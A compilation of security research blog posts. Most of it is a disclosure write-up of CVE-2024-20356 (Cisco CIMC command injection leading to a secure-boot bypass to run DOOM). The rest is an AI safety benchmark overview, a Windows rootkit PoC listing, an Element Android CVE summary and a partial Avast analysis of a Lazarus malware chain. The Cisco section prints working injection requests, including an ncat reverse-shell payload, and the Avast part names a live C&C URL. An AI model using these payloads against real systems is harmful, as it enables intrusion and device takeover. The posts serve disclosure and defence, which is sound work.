Note there are three chips in total – the bottom green flash is used for CIMC/BMC, the middle marked with red is the main BIOS flash and the top one (slightly out of frame) is the backup BIOS flash.

The CH431A is a very powerful, cost effective device which acts as a multitool for IoT hacking (with the 3.3v modification). Its core is designed to act as a SPI programmer but also has a UART interface. In short, you can hook onto or remove SPI-compatible flash chips from the target PCB and use the programmer to interact with the device. You can make a full 1:1 backup of that chip so if anything goes wrong you can restore the original state. On top of that, you can also tamper with or write to the chip.

The below screenshot shows reading the middle flash chip using flashrom and the CH341A. If following along, it’s important to make a copy of the firmware below, maybe two, maybe three – keep these safe and store original versions with MD5 hashes.

UEFITool is a nice way to visualise different parts of a modern UEFI BIOS. It provides a breakdown of different sections and what they do. In recent versions, the ability to view Intel BootGuard protected areas are marked which is especially important when attacking UEFI implementations.

On the topic of tampering with the BIOS, why can’t we just replace the BIOS with a version that does not have secure boot enabled, has keys allowing us to boot other EFI files, or a backdoor allowing us to boot our own code? Intel BootGuard. This isn’t well known but is a really neat feature of Intel-based products. Effectively it is secure-boot for the BIOS itself. Public keys are burned into CPUs using onboard fuses. These public keys can be used to validate the firmware being loaded. There’s quite a lot to Intel BootGuard, but in the interest of keeping this article short(ish), for now all you need to know is it’s a hardware-based root of trust, which means you can’t directly modify parts of the firmware. Note, it doesn’t include the entire flash chip as this is also used for user configuration/storage, which can’t be easily signed.

The latest firmware ISO was obtained and the BIOS .cap file was extracted.

The .cap file contained a header of 2048 bytes with important information about the firmware. This would be read by the built-in tools to update the BIOS, ensuring everything is correct. After removing the header, it needs to be decompressed with bzip2.

The update BIOS image contains the information that would be placed in the BIOS region. Note, we can’t directly flash the bios.cap file onto the flash chip as there are important sections missing, such as the Intel ME section.

The .cap file itself has another header of 0x10D8 (4312) which can be removed with a hex editor or DD.

The update file and the original BIOS should look somewhat similar at the beginning. However, the update file is missing important sections.

To only update what was in the BIOS region, we can copy the update file from 0x1000000 (16777216) onwards into the flash file at the same location. DD can be used for this by taking the first half of the flash, the second half of the update, and merging them together.

The original firmware should match in size to our new updated firmware.

Just to be safe, we can check with UEFITool to make sure nothing went majorly wrong. The screenshot below shows everything looks fine, and the UUIDs for the new volumes in the BIOS region have been updated.

In the same way the flash dump was obtained, the updated image can be placed back.

With the BIOS updated to the latest version, a few new features are available. The BIOS screen now presents the option to configure CIMC! Result! Alas, we still cannot make meaningful configuration changes, disable secure boot, or boot our own code.

In the meantime, we found CIMC was configured with a static IP of 0.0.0.0. This would explain why we couldn’t interact with it earlier. A new IP address was set, and we have a new attack surface to explore.

CIMC, Cisco Integrated Management Console, is a small ASPEED-Pilot-4-based onboard body-management-controller (BMC). This is a lights-out controller for the device so can be used as a KVM and power management solution. In this implementation, it’s used to handle core system functions such as power management, fan control, etc.

CIMC in itself comes with a default username of “admin” and a default password of “cisco”. CIMC can either be on a dedicated interface or share the onboard NICs. CIMC has full control over the BIOS, peripheral chips, onboard CPU and a number of other systems running on the C195/C220.

At this point the user is free to update CIMC to the latest version and make configuration changes. It was not possible to disable the secure boot process or run any other code aside from the signed Cisco Appliance operating system. Even though we had the option to configure secure boot keys, these did not take effect nor did any critical configuration changes. CIMC recognised on the dashboard that it was a C195 device.

At this stage, it is possible to update CIMC to other versions using the update/flash tool.

CVE-2024-20356: Command Injection

The ISO containing the BIOS updates also contained a copy of the CIMC firmware.

This firmware, alongside the BIOS, is fairly generic for the base model C220 device. It is designed to identify the model of the device and put appropriate accommodations in place, such as locking down certain features or making new functions available. This saves time in production as one good firmware build can be used against a range of devices without major problems.

As this firmware is designed to accommodate many device types, we observe a few interesting files and features along the way.

The cimc.bin file located in /firmware/cimc/ contains a wealth of information.

The binwalk tool can be used to explore this information. At a high level, binwalk will look for patterns in files to identify locations of potential embedded files, file systems or data. It can also be extracted using this tool. The below screenshot shows a common embedded uBoot Linux system that uses a compressed squashfs filesystem to hold the root filesystem.

While looking through these filesystems, a few interesting files were discovered. The library located at /usr/local/lib/appweb/liboshandler.so was used to handle requests to the web server. This file contained debug symbols, making it easier to understand the class structure and what functions are used for. The library was decompiled using Ghidra.

The ExpFwUpdateUtilityThread function, part of ExpUpdateAgent, was found to be affected by a command injection vulnerability. The user-submitted input is validated, however, certain characters were allowed which can be used to execute commands outside of the intended application scope.

/* ExpFwUpdateUtilityThread(void*) */ 

void * ExpFwUpdateUtilityThread(void *param_1) 

{ 
  int iVar1; 
  ProcessingException *pPVar2; 
  undefined4 uVar3; 
  char *pcVar4; 
  bool bVar5; 
  undefined auStack192 [92]; 
  basic_string<char,std::char_traits<char>,std::allocator<char>> abStack100 [24];

The ExpFwUpdateUtilityThread function is called from an API request to expRemoteFwUpdate. This takes four parameters, and appears to provide the ability to update the firmware for SAS Controllers or Drives. The path parameter is validated against a list of known good characters, which includes $, ( and ). The function performs string formatting with user data against the following string: curl -o %s %s://%s/%s %s. Upon successfully validating the user-supplied data, the formatted string is passed into system_secure(), which performs additional validation, however still allows characters which can be used to inject commands through substitution.

/* ExpFwUpdateUtilityThread(void*) */ 
if (local_24 == 0) { 
    iVar1 = strcmp(var_param_type,"tftp"); 
    if ((iVar1 == 0) || (iVar1 = strcmp(var_param_type,"http"), iVar1 == 0)) { 
      memset(&DAT_001a3798,0,0x200); 
      snprintf(&DAT_001a3798,0x200,"curl -o %s %s://%s/%s %s","/tmp/fwimage.bin",var_param_type, 
               var_host,var_path,local_48); 
      iVar1 = system_check_user_input(var_host,"general_rule"); 
      if ((iVar1 == 0) || 
         ((iVar1 = system_check_user_input(var_param_type,"general_rule"), iVar1 == 0 || 
          (iVar1 = system_check_user_input(var_path,"general_rule"), iVar1 == 0)))) { 
        bVar5 = true; 
      } 
      else { 
        bVar5 = false; 
      } 
      if (bVar5) { 
        pPVar2 = (ProcessingException *)__cxa_allocate_exception(0xc); 
        ProcessingException::ProcessingException(pPVar2,"Parameters are invalid"); 
                    /* WARNING: Subroutine does not return */ 
        __cxa_throw(pPVar2,&ProcessingException::typeinfo,ProcessingException::~ProcessingException); 
      } 

      set_status(1,"DOWNLOADING",'\0',local_2c,local_28); 
      system_secure(&DAT_001a3798); 
    }

The following function is called to check the input against a list of allowed characters. 

undefined4 system_check_user_input(undefined4 param_1,char *param_2)
{
    int iVar1;
    char *local_1c;
    undefined4 local_18;
    char *local_14;
    undefined4 local_10;
    undefined4 local_c;x
    
    local_c = 0xffffffff;
    iVar1 = strcmp(param_2,"password_rule");
    if (iVar1 == 0) {
        local_1c =
        " !\"#$&\'()*+,-./0123456789:;=>@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\_abcdefghijklmnopqrstuvwxyz{|}";
        local_18 = 0x57;
        local_c = FUN_000d8120(param_1,&local_1c);
}

Although the ExpFwUpdateUtilityThread function performs some checks on the user input, additional checks are performed with another list of allowed characters.

undefined4 system_secure(undefined4 param_1)
{
    undefined4 uVar1;
    char *local_10;
    undefined4 local_c;
    
    local_10 =
    " !\"#$&\'()*+,-./0123456789:;=>@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\_abcdefghijklmnopqrstuvwxyz{|}";
    local_c = 0x57;
    uVar1 = system_secure_ex(param_1,&local_10);
    return uVar1;
}

The system_secure function calls system_secure_ex, which after passing validation executes the provided command with system(). 

int system_secure_ex(char *param_1,undefined4 param_2) 

{ 
  int iVar1; 
  int local_c; 

  local_c = -1; 
  iVar1 = FUN_000d8120(param_1,param_2); 
  if (iVar1 == 1) { 
    local_c = system(param_1); 
  } 
  else { 
    syslog(3,"%s:%d:ERR: The given command is not secured to run with system()\n","systemsecure.c ", 
           0x98); 
  } 
  return local_c; 
}

We can take the knowledge learnt from the above library and apply it in an attempt to exploit the issue. This can be achieved by using $(echo $USER) in order to substitute the text for the current username. The function itself is designed to make a curl request to download firmware updates from a third-party using curl. We can use this functionality to exfiltrate our executed command.

The following query can be used to demonstrate command injection:

set=expRemoteFwUpdate("1", "http","192.168.0.96","/$(echo $USER)")

This can be placed in a POST request to https://CIMC/data with an administrator’s sessionCookie and sessionID.

POST /data HTTP/1.1
Host: 192.168.0.102
Cookie: sessionCookie=ef4eb2e3b0[REDACTED]
Content-Length: 189
Content-Type: application/x-www-form-urlencoded
Referer: https://192.168.0.102/index.html

sessionID=2132002102bb[REDACTED]&queryString=set%253dexpRemoteFwUpdate(%25221%2522%252c%2520%2522http%2522%252c%2522192.168.0.96%2522%252c%2522%252f%2524(echo%2520%2524USER)%2522)

This is shown in the screenshot below.

When the request is made, the command output is received by the attacker’s web server.

Having underlying system access to the Cisco Integrated Management Console poses a significant risk through the breakdown of confidentiality, integrity and availability. With this level of access, a threat actor is able to read, modify and overwrite information on the running system, given that CIMC has a high level of access throughout the device. Furthermore, as underlying access is granted to the firmware itself, this poses an integral risk whereby an attacker could introduce a backdoor into the firmware and prevent users from discovering that the device has been compromised. Finally, availability may be affected if the firmware is modified, as it could be corrupted to prevent the device from booting without a recovery method.

This can be taken a step further to get a full reverse shell from the BMC using the following query string:

set=expRemoteFwUpdate("1", "http","192.168.0.96","/$(ncat 192.168.0.96 1337 -e /bin/sh)")

In a full request, this would encode to:

POST /data HTTP/1.1
Host: 192.168.0.102
Cookie: sessionCookie=05f0b903b0[REDACTED]
Content-Length: 228
Content-Type: application/x-www-form-urlencoded
Referer: https://192.168.0.102/index.html

sessionID=1e310e110fb[REDACTED]&queryString=set%253dexpRemoteFwUpdate(%25221%2522%252c%2520%2522http%2522%252c%2522192.168.0.96%2522%252c%2522%252f%2524(ncat%2520192.168.0.96%25201337%2520-e%2520%252fbin%252fsh)%2522)

This is shown in the screenshot below.

A full root shell on the underlying BMC is then received on port 1337. The following screenshot demonstrates this by identifying the current user, version and CPU type.

Note: To obtain the sessionCookie and sessionID, the user must login as an administrator using the default credentials of admin and password. The sessionCookie can be taken from the response headers and the sessionID can be taken from the response body under <sidValue>.

So, we have the ability to execute commands on CIMC. The next step involves automating this process to make it easier to reach our goal of running DOOM.

As it stands, the command injection vulnerability is blind. You need to leverage the underlying curl command to exfiltrate data. This is fine for small outputs but breaks when the URL limit is hit, or if unusual characters are included.

Another method to exfiltrate information was identified through writing a file to the web root with a specific filename in order to match the regex inside the nginx configuration.

The following section in the configuration is used to only serve certain files in the web root directory. This includes common documents such as index.html, 401.html, 403.html etc. The filename “in.html” matches this regex and is not currently used.

The toolkit uses this to obtain command output. Command output is written to /usr/local/www/in.html.

CVE-2024-20356: Exploit Toolkit

To automate this process I created a tool called CISCown which allows you to test for the vulnerability, exploit the vulnerability, and even open up a telnetd root shell service.

The exploit kit takes a few parameters:

  • -t TARGET
  • -u USERNAME
  • -p PASSWORD
  • -v VERBOSE (obtains more information about CIMC)
  • -a ACTION
    • “test” tries to exploit command injection by echoing a random number to “in.html” and reading it
    • “cmd” executes a command (default if -c is provided)
    • “shell” executes “busybox telnetd -l /bin/sh -p 23”
    • “dance” puts on a light show
  • -c CMD

The toolkit can be found on GitHub below:

github GitHub: https://github.com/nettitude/CVE-2024-20356

A few examples of the tool’s usage are shown below.

Testing for the vulnerability:

Exploiting the vulnerability with id command:

Exploiting the vulnerability with cat /proc/cpuinfo to check the CPU in use:

Exploiting the vulnerability to gain a full telnet shell:

Exploiting the vulnerability to dance (yes, this is in the toolkit):

Compromising The Secure Boot Chain

We have root access on the BMC but we still cannot run our own code on the main server. Even after modifying a few settings in the BIOS and on the web CIMC administration page, it was not possible to run EFI files not signed with the Cisco Appliance keys.

The boot menu below only contains one boot device, the EFI shell.

If a USB stick is plugged in, the device throws a Secure Boot Violation warning and reverts back to the EFI shell.

It’s not even possible to use the EFI shell to boot EFI files not signed by Cisco.

The option to disable secure boot was still greyed out.

In general, secure boot is based around four key databases:

  • db – Signatures Database – Database of allowed signatures
  • dbx – Forbidden Signatures Database – Database of revoked signatures
  • kek – Key Exchange Key – Keys used to sign db and dbx
  • pk – Platform Key – Top level key in secure boot

The device itself only contains db keys for authorised Cisco appliance applications/EFI files. This means restrictions are in place to restrict what the device can boot/load, including EFI modules. Some research was performed into how the device handles secure boot and the chain of trust.

In order to compromise the secure boot chain, we need to find a way to either disable secure boot or use our own key databases. The UEFI spec states that vendors can store these keys in multiple locations, such as in the BIOS flash itself, TPM, or externally.

While looking around CIMC and the BMC, an interesting script was discovered which is executed on start-up. The intent behind this script is to prepare the BIOS with the appropriate secure boot databases and settings.

The script defines a number of hardcoded locations for different profiles supported by CIMC.

When the script runs, the device gets the current PID value. In our case it was C195, being the model of the device. Note, the below script first attempts to fetch this from /tmp/pid_validated, and if it can’t find this file it will read the PID from the platform management’s FRU. This will display C195, which is then saved in /tmp/pid_validated.

The script will then go through and check the PID against all supported profiles.

It does this for every type of profile defined at the top of the script. These profiles contain all of the secure boot key databases such as PK, KEK, DB and DBX.

The check takes the PID of C195 and passes it to is_stbu_rel, which has a small regex pattern to determine what the device is. If it matches, a number of variables are configured and update_pers_data is called to set the secure boot profile to use. The profile is what the BIOS then uses as a keystore for secure boot.

The chain of trust here is as follows:

  • FRU -> BMC with the PID values
  • BMC -> BIOS with the secure boot keys

As we have compromised the BMC, we can intercept or modify this process with our own PID or keys. By creating or overwriting the /tmp/pid_validated file, we can trick bios_secure_vars_setup.sh into thinking the device is something else and provide a different set of keys.

The following example demonstrates changing the device to the ND-NODE-L4 profile which supports a broader range of allowed EFI modules and vendors.

NOTE: BACKUP THE BIOS AT THIS POINT!

First shut down the device and ensure you have made a backup of the BIOS. This is an important step, as modifying secure boot keys which do not authorise core components to run can prevent the device from booting (essentially bricking it).

The PID is as follows: C195.

The /tmp/pid_validated file was overwritten with a new PID of ND-NODE-L4.

The bios_secure_vars_setup.sh script was run again to reinitialise the secure boot environment.

The device can then be powered back on. Upon turning on the device, a number of other boot devices were available from the Ethernet Controllers. This is a good sign, as it means more EFI modules were loaded.

The boot device manager or EFI shell can be used to boot into an external drive containing an operating system that supports UEFI. In my case, I was using a USB stick plugged into the back of the device.

Instead of an access denied error, bootx64.efi was loaded successfully and Ubuntu started, demonstrating we now have non-standard code running on the Cisco C195 Email Appliance.

Finally to complete the main goal:

In conclusion, it’s possible to follow this attack chain to repurpose a Cisco appliance device to run DOOM. The full chain incorporated:

  • Modifying the BIOS to expose CIMC to the network.
  • Attacking the CIMC management system over the network via remote command execution vulnerability (CVE-2024-20356) to gain root access to a critical component in the system.
  • Finally, compromising the secure boot chain by modifying the device PID to use other secure boot keys.

To address this vulnerability, it’s best to adhere to the following advice to reduce the likelihood and impact of exploitation:

  • Change the default credentials and uphold a strong password policy.
  • Update the device to a version which patches CVE-2024-20356.

Disclosure

While it may seem cool to run DOOM on a Cisco Appliance device, the vulnerability exploited does pose a threat to the confidentiality, integrity and availability of data stored and processed on the server. The issue in itself could be used to backdoor the machine and run unauthorised code, especially impactful given that the body management controller has a high level of access throughout the device.

The product tested in this writeup was C195/C220 M5 - CIMC 4.2(3e). However, as the firmware is used across a range of different devices, this vulnerability would affect a range of different products. The full affected list can be found on Cisco’s website below:

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cimc-cmd-inj-bLuPcb

Cisco was initially informed of the issue on 06 December 2023 and began triage on 07 December 2023. The Cisco PSIRT responded within 24 hours of initial contact and promptly began working on fixes. A public disclosure date was agreed upon for 17 April 2024, and CVE-2024-20356 was assigned by the vendor with a severity rating of High (CVSS score of 8.7). I would like to thank Todd Reid, Amber Hurst, Mick Buchanan, and Marco Cassini from Cisco for collaborating with us to resolve the issue.

The post CVE-2024-20356: Jailbreaking a Cisco appliance to run DOOM appeared first on LRQA Nettitude Labs.

Introducing the MLCommons AI Safety v0.5 Proof of Concept

Artificial Intelligence (AI) has been making significant strides in recent years, with advancements in machine learning and deep learning techniques. However, as AI systems become more complex and powerful, ensuring their safety becomes increasingly critical. In a ground-breaking move towards enhancing AI safety, MLCommons, an open collaboration-focused Artificial Intelligence engineering consortium, has unveiled the MLCommons AI Safety v0.5 benchmark proof-of-concept (POC). Led by a global group of industry experts, researchers, and advocates, this milestone marks the initial step in establishing a standardized approach to measuring AI safety.

This blog post aims to introduce this benchmark, its purpose, and its significance in the AI industry.

What is the MLCommons AI Safety v0.5 Benchmark?

This benchmark aims to evaluate the safety and robustness of AI systems, particularly those utilized in general-purpose AI chat applications. It assesses AI systems on various safety aspects, including their handling of harmful instructions, inappropriate content, and personal data requests, as well as their capability to provide accurate and helpful responses to user queries.

Why is the MLCommons AI Safety v0.5 Benchmark Important?

As AI systems become more integrated into our daily lives, ensuring their safety and robustness is of paramount importance. The MLCommons AI Safety v0.5 benchmark provides a standardized way to measure and compare the safety of different AI systems.

The MLCommons AI Safety v0.5 benchmark offers a standardized method for measuring and comparing AI safety across different systems. It holds particular significance for general-purpose AI chat applications, which directly interact with users, making it crucial for them to manage user interactions safely and appropriately.

This benchmark helps guarantee that these applications adhere to necessary safety standards by providing an objective measure of an AI system’s safety, enabling developers to identify and address potential safety concerns.

How Does the MLCommons AI Safety v0.5 Benchmark Work?

The MLCommons AI Safety v0.5 benchmark evaluates AI systems using a series of tests. These tests are designed to assess the system’s ability to handle a variety of safety-related scenarios.

For example, one test might involve giving the AI system a harmful instruction, such as “Delete all files on the computer,” and seeing how it responds. The system should refuse to carry out the harmful instruction and provide a safe and appropriate response instead.

Other tests might involve presenting the system with inappropriate content or a request for personal data. The system should be able to handle these situations appropriately, refusing to engage with the inappropriate content or protect the user’s personal data.

Rating AI Safety

Rating AI safety is a crucial aspect of benchmarking, involving the translation of complex numeric results into actionable ratings. To achieve this, the POC employs a community-developed scoring method. These ratings are relative to the current “accessible state-of-the-art” (SOTA), which refers to the safety results of the best public models with fewer than 15 billion parameters that have been tested. However, the lowest risk rating is defined by an absolute standard, representing the goal for progress in the SOTA.

In summary, the ratings are as follows:

  • High Risk (H): Indicates that the model’s risk is very high (4x+) relative to the accessible SOTA.
  • Moderate-high risk (M-H): Implies that the model’s risk is substantially higher (2-4x) than the accessible SOTA.
  • Moderate risk (M): Suggests that the model’s risk is similar to the accessible SOTA.
  • Moderate-low risk (M-L): Indicates that the model’s risk is less than half of the accessible SOTA.
  • Low risk (L): Represents a very low absolute rate of unsafe model responses, with 0.1% in v0.5.

To demonstrate the rating process, the POC includes ratings of over a dozen anonymized systems-under-test (SUT). This validation across a spectrum of currently-available LLMs helps to verify the effectiveness of the approach.

Hazard scoring details – The grade for each hazard is calculated relative to accessible state-of-the-art models and, in the case of low risk, an absolute threshold of 99.9%. The different coloured bars represent the grades from left to right H, M-H, M, M-L, and L.

What are the Key Features of the MLCommons AI Safety v0.5 Benchmark?

The MLCommons AI Safety v0.5 benchmark includes several key features that make it a valuable tool for assessing AI safety.

  • Comprehensive Coverage: The benchmark covers a wide range of safety-related scenarios, providing a comprehensive assessment of an AI system’s safety.
  • Objective Measurement: The benchmark provides a clear and objective measure of an AI system’s safety, making it easier to compare different systems and identify potential safety issues.
  • Open Source: The benchmark is open source, meaning that anyone can use it to assess their AI system’s safety. This also allows for continuous improvement and refinement of the benchmark based on community feedback.
  • Focus on General-Purpose AI Chat Applications: The benchmark is specifically designed for general-purpose AI chat applications, making it particularly relevant for this rapidly growing field.

Challenges

As with any process that attempts to benchmark all scenarios, there are limitations which should be considered when reviewing the results:

  • Negative Predictive Power: The MLC AI Safety Benchmark tests solely possess negative predictive power. Excelling in the benchmark doesn’t guarantee model safety; it indicates undiscovered safety vulnerabilities.
  • Limited Scope: Version 0.5 of the taxonomy and benchmark lacks several critical hazards due to feasibility constraints. These omissions will be addressed in future iterations.
  • Artificial Prompts: All prompts are expert-crafted for clarity and ease of assessment. Despite being informed by research and industry practices, they are not real-world prompts.
  • Significant Variance: Test outcomes exhibit notable variance compared to actual behaviour, stemming from prompt selection limitations and noise from automatic evaluation methods for subjective criteria.

Conclusion

The MLCommons AI Safety v0.5 benchmark is a significant step forward in ensuring the safety and robustness of AI systems. By providing a standardized way to measure and compare AI safety, it helps developers identify and address potential safety issues, ultimately leading to safer and more reliable AI applications.

As AI continues to advance and become more integrated into our daily lives, tools like the MLCommons AI Safety v0.5 benchmark will become increasingly important. By focusing on safety, we can ensure that AI serves us effectively and responsibly, enhancing our lives without compromising our safety or privacy.

For further reading on AI safety benchmarks, you can visit MLCommons or explore more about general-purpose AI chat applications.

To explore this more for yourself – Review the Model Bench on GitHub – https://github.com/mlcommons/modelgauge/

Want more insight into AI? feel free to review the rest of our content on labs or have a play on our vulnerable prompt injection game.

The post Introducing the MLCommons AI Safety v0.5 Proof of Concept appeared first on LRQA Nettitude Labs.

VectorKernel - PoCs For Kernelmode Rootkit Techniques Research


PoCs for Kernelmode rootkit techniques research or education. Currently focusing on Windows OS. All modules support 64bit OS only.

NOTE

Some modules use ExAllocatePool2 API to allocate kernel pool memory. ExAllocatePool2 API is not supported in OSes older than Windows 10 Version 2004. If you want to test the modules in old OSes, replace ExAllocatePool2 API with ExAllocatePoolWithTag API.

 

Environment

All modules are tested in Windows 11 x64. To test drivers, following options can be used for the testing machine:

  1. Enable Loading of Test Signed Drivers

  2. debugging-in-windbg--cdb--or-ntsd">Setting Up Kernel-Mode Debugging

Each options require to disable secure boot.

Modules

Detailed information is given in README.md in each project's directories. All modules are tested in Windows 11.

Module Name Description
BlockImageLoad PoCs to block driver loading with Load Image Notify Callback method.
BlockNewProc PoCs to block new process with Process Notify Callback method.
CreateToken PoCs to get full privileged SYSTEM token with ZwCreateToken() API.
DropProcAccess PoCs to drop process handle access with Object Notify Callback.
GetFullPrivs PoCs to get full privileges with DKOM method.
GetProcHandle PoCs to get full access process handle from kernelmode.
InjectLibrary PoCs to perform DLL injection with Kernel APC Injection method.
ModHide PoCs to hide loaded kernel drivers with DKOM method.
ProcHide PoCs to hide process with DKOM method.
ProcProtect PoCs to manipulate Protected Process.
QueryModule PoCs to perform retrieving kernel driver loaded address information.
StealToken PoCs to perform token stealing from kernelmode.

TODO

More PoCs especially about following things will be added later:

  • Notify callback
  • Filesystem mini-filter
  • Network mini-filter

Recommended References



Element Android CVE-2024-26131, CVE-2024-26132 - Never Take Intents From Strangers

TL;DR During a security audit of Element Android, the official Matrix client for Android, we have identified two vulnerabilities in how specially forged intents generated from other apps are handled by the application. As an impact, a malicious application would be able to significatively break the security of the application, with possible impacts ranging from exfiltrating sensitive files via arbitrary chats to fully taking over victims’ accounts. After private disclosure of the details, the vulnerabilities have been promptly accepted and fixed by the Element Android team.

From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams

Key Points

  • Avast discovered a new campaign targeting specific individuals through fabricated job offers. 
  • Avast uncovered a full attack chain from infection vector to deploying “FudModule 2.0” rootkit with 0-day Admin -> Kernel exploit. 
  • Avast found a previously undocumented Kaolin RAT, where it could aside from standard RAT functionality, change the last write timestamp of a selected file and load any received DLL binary from C&C server. We also believe it was loading FudModule along with a 0-day exploit. 

Introduction

In the summer of 2023, Avast identified a campaign targeting specific individuals in the Asian region through fabricated job offers. The motivation behind the attack remains uncertain, but judging from the low frequency of attacks, it appears that the attacker had a special interest in individuals with technical backgrounds. This sophistication is evident from previous research where the Lazarus group exploited vulnerable drivers and performed several rootkit techniques to effectively blind security products and achieve better persistence. 

In this instance, Lazarus sought to blind security products by exploiting a vulnerability in the default Windows driver, appid.sys (CVE-2024-21338). More information about this vulnerability can be found in a corresponding blog post

This indicates that Lazarus likely allocated additional resources to develop such attacks. Prior to exploitation, Lazarus deployed the toolset meticulously, employing fileless malware and encrypting the arsenal onto the hard drive, as detailed later in this blog post. 

Furthermore, the nature of the attack suggests that the victim was carefully selected and highly targeted, as there likely needed to be some level of rapport established with the victim before executing the initial binary. Deploying such a sophisticated toolset alongside the exploit indicates considerable resourcefulness. 

This blog post will present a technical analysis of each module within the entire attack chain. This analysis aims to establish connections between the toolset arsenal used by the Lazarus group and previously published research. 

Initial access 

The attacker initiates the attack by presenting a fabricated job offer to an unsuspecting individual, utilizing social engineering techniques to establish contact and build rapport. While the specific communication platform remains unknown, previous research by  Mandiant and ESET suggests potential delivery vectors may include LinkedIn, WhatsApp, email or other platforms. Subsequently, the attacker attempts to send a malicious ISO file, disguised as VNC tool, which is a part of the interviewing process. The choice of an ISO file is starting to be very attractive for attackers because, from Windows 10, an ISO file could be automatically mounted just by double clicking and the operating system will make the ISO content easily accessible. This may also serve as a potential Mark-of-the-Web (MotW) bypass. 

Since the attacker created rapport with the victim, the victim is tricked by the attacker to mount the ISO file, which contains three files: AmazonVNC.exe, version.dll and aws.cfg. This leads the victim to execute AmazonVNC.exe.  

The AmazonVNC.exe executable only pretends to be the Amazon VNC client, instead, it is a legitimate Windows application called choice.exe that ordinarily resides in the System32 folder. This executable is used for sideloading, to load the malicious version.dll through the legitimate choice.exe application. Sideloading is a popular technique among attackers for evading detection since the malicious DLL is executed in the context of a legitimate application.  

When AmazonVNC.exe gets executed, it loads version.dll. This malicious DLL is using native Windows API functions in an attempt to avoid defensive techniques such as user-mode API hooks. All native API functions are invoked by direct syscalls. The malicious functionality is implemented in one of the exported functions and not in DLL Main. There is no code in DLLMain it just returns 1, and in the other exported functions is just Sleep functionality. 

After the DLL obtains the correct syscall numbers for the current Windows version, it is ready to spawn an iexpress.exe process to host a further malicious payload that resides in the third file, aws.cfg. Injection is performed only if the Kaspersky antivirus is installed on the victim’s computer, which seems to be done to evade Kaspersky detection. If Kaspersky is not installed, the malware executes the payload by creating a thread in the current process, with no injection. The aws.cfg file, which is the next stage payload, is obfuscated by VMProtect, perhaps in an effort to make reverse engineering more difficult. The payload is capable of downloading shellcode from a Command and Control (C&C) server, which we believe is a legitimate hacked website selling marble material for construction. The official website is https://www[.]henraux.com/, and the attacker was able to download shellcode from https://www[.]henraux.com/sitemaps/about/about.asp 

In detailing our findings, we faced challenges extracting a shellcode from the C&C server as the malicious URL was unresponsive.  

By analyzing our telemetry, we uncovered potential threats in one of our clients, indicating a significant correlation between the loading of shellcode from the C&C server via an ISO file and the subsequent appearance of the RollFling, which is a new undocumented loader that we discovered and will delve into later in this blog post. 

Moreover, the delivery method of the ISO file exhibits tactical similarities to those employed by the Lazarus group, a fact previously noted by researchers from Mandiant and ESET

In addition, a RollSling sample was identified on the victim machines, displaying code similarities with the RollSling sample discussed in Microsoft’s research. Notably, the RollSling instance discovered in our client’s environment was delivered by the RollFling loader, confirming our belief in the connection between the absent shellcode and the initial loader RollFling. For visual confirmation, refer to the first screenshot showcasing the SHA of RollSling report code from Microsoft, while on the second screenshot is the code derived from our RollSling sample. 

Image illustrates the RollSling code identified by Microsoft. SHA:
d9add2bfdfebfa235575687de356f0cefb3e4c55964c4cb8bfdcdc58294eeaca.
Image showcases the RollSling code discovered within our targe. SHA: 68ff1087c45a1711c3037dad427733ccb1211634d070b03cb3a3c7e836d210f.

In the next paragraphs, we are going to explain every component in the execution chain, starting with the initial RollFling loader, continuing with the subsequently loaded RollSling loader, and then the final RollMid loader. Finally, we will analyze the Kaolin RAT, which is ultimately loaded by the chain of these three loaders. 

Loaders

RollFling

The RollFling loader is a malicious DLL that is established as a service, indicating the attacker’s initial attempt at achieving persistence by registering as a service. Accompanying this RollFling loader are essential files crucial for the consistent execution of the attack chain. Its primary role is to kickstart the execution chain, where all subsequent stages operate exclusively in memory. Unfortunately, we were unable to ascertain whether the DLL file was installed as a service with administrator rights or just with standard user rights. 

The loader acquires the System Management BIOS (SMBIOS) table by utilizing the Windows API function GetSystemFirmwareTable. Beginning with Windows 10, version 1803, any user mode application can access SMBIOS information. SMBIOS serves as the primary standard for delivering management information through system firmware. 

By calling the GetSystemFirmwareTable (see Figure 1.) function, SMBIOSTableData is retrieved, and that SMBIOSTableData is used as a key for decrypting the encrypted RollSling loader by using the XOR operation. Without the correct SMBIOSTableData, which is a 32-byte-long key, the RollSling decryption process would be ineffective so the execution of the malware would not proceed to the next stage. This suggests a highly targeted attack aimed at a specific individual. 

This suggests that prior to the attacker establishing persistence by registering the RollFling loader as a service, they had to gather information about the SMBIOS table and transmit it to the C&C server. Subsequently, the C&C server could then reply with another stage. This additional stage, called  RollSling, is stored in the same folder as RollFling but with the ".nls" extension.  

After successful XOR decryption of RollSlingRollFling is now ready to load decrypted RollSling into memory and continue with the execution of RollSling

Figure 1: Obtaining SMBIOS firmware table provider

RollSling

The RollSling loader, initiated by RollFling, is executed in memory. This choice may help the attacker evade detection by security software. The primary function of RollSling is to locate a binary blob situated in the same folder as RollSling (or in the Package Cache folder). If the binary blob is not situated in the same folder as the RollSling, then the loader will look in the Package Cache folder. This binary blob holds various stages and configuration data essential for the malicious functionality. This binary blob must have been uploaded to the victim machine by some previous stage in the infection chain.  

The reasoning behind binary blob holding multiple files and configuration values is twofold. Firstly, it is more efficient to hold all the information in a single file and, secondly, most of the binary blob can be encrypted, which may add another layer of evasion meaning lowering the chance of detection.  

Rollsling is scanning the current folder, where it is looking for a specific binary blob. To determine which binary blob in the current folder is the right one, it first reads 4 bytes to determine the size of the data to read. Once the data is read, the bytes from the binary blob are reversed and saved in a temporary variable, afterwards, it goes through several conditions checks like the MZ header check. If the MZ header check is done, subsequently it looks for the “StartAction” export function from the extracted binary. If all conditions are met, then it will load the next stage RollMid in memory. The attackers in this case didn’t use any specific file name for a binary blob or any specific extension, to be able to easily find the binary blob in the folder. Instead, they have determined the right binary blob through several conditions, that binary blob had to meet. This is also one of the defensive evasion techniques for attackers to make it harder for defenders to find the binary blob in the infected machine. 

This stage represents the next stage in the execution chain, which is the third loader called RollMid which is also executed in the computer’s memory. 

Before the execution of the RollMid loader, the malware creates two folders, named in the following way: 

  • %driveLetter%:\\ProgramData\\Package Cache\\[0-9A-Z]{8}-DF09-AA86-YI78-[0-9A-Z]{12}\\ 
  • %driveLetter%:\\ProgramData\\Package Cache\\ [0-9A-Z]{8}-09C7-886E-II7F-[0-9A-Z]{12}\\ 

